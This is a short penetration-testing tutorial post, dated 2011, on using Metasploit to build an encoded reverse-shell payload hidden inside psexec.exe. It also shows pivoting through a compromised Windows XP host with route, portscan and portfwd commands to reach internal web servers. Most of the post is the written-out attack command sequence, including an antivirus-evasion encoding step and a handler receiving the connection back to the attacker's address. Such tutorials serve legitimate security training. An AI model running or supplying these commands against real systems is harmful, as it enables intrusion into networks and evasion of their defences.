pbnetworks - Computer Security Solutions

pbnetworks - Computer Security Solutions

03/15/11 Meterpreter encoding & pivot

In this tutorial I use the Back|Track distro and metasploit to encode the psexec.exe then copy it over to a WindowsXP fully patched box.&nbsp; We can get our executable to our victim machine a number of ways and I will that for later.  I have listed the steps involved in using metasploit below and in the video.<br />
# msfpayload windows/shell/reverse_tcp LHOST=192.168.1.132, LPORT=4444 R | msfencode -c 10 -e x86/shikata-ga_nai -x /root/psexec.exe -t exe > psexec3.exe
# msfconsole
msf> use multi/handler
msf> set payload windows/meterpreter/reverse_tcp
msf> set LPORT 4444
msf> set LHOST 192.168.1.132
msf> exploit
meterpreter> ipconfig                    This listed 2 different network interfaces 192.168.1.134 & 192.168.15.2
meterpreter> run arp_scanner -h   help cmd
meterpreter> run arp_scanner -r 192.168.15.1/24
meterpreter> background
msf> route add 192.168.15.1 255.255.255.0 1      Now this 1 is specific to the meterpreter session
msf> route print
msf> use auxiliary/scanner/portscan/tcp
msf> set RHOSTS 192.168.15.1, 192.168.15.3      We got these ips fro the arp scan we did earlier
msf> set PORTS 1-200                                           You can set this to what you like but it will take time
msf> run                                                                Now you have a list of open ports that you can exploit
msf> back
msf> sessions -i 1
meterpreter> portfwd add -l 8000 -p 80 -r 192.168.15.3
meterpreter> portfwd add -l 8080 -p 80 -r 192.168.15.1
open firefox http://127.0.0.1:8000 & http://127.0.0.1:8080

Now we have been able to view 2 systems that are internal to a network using the pivoting of the meterpreter payload.  The scan we did went through 192.168.1.134 > 192.168.15.2 > 192.168.15.1 & 192.168.15.3.  We then used the portfwd command to display the internal web page locally over SSL.


Return to Home
Copyright © 2024 pbnetworks. All Rights Reserved. ip information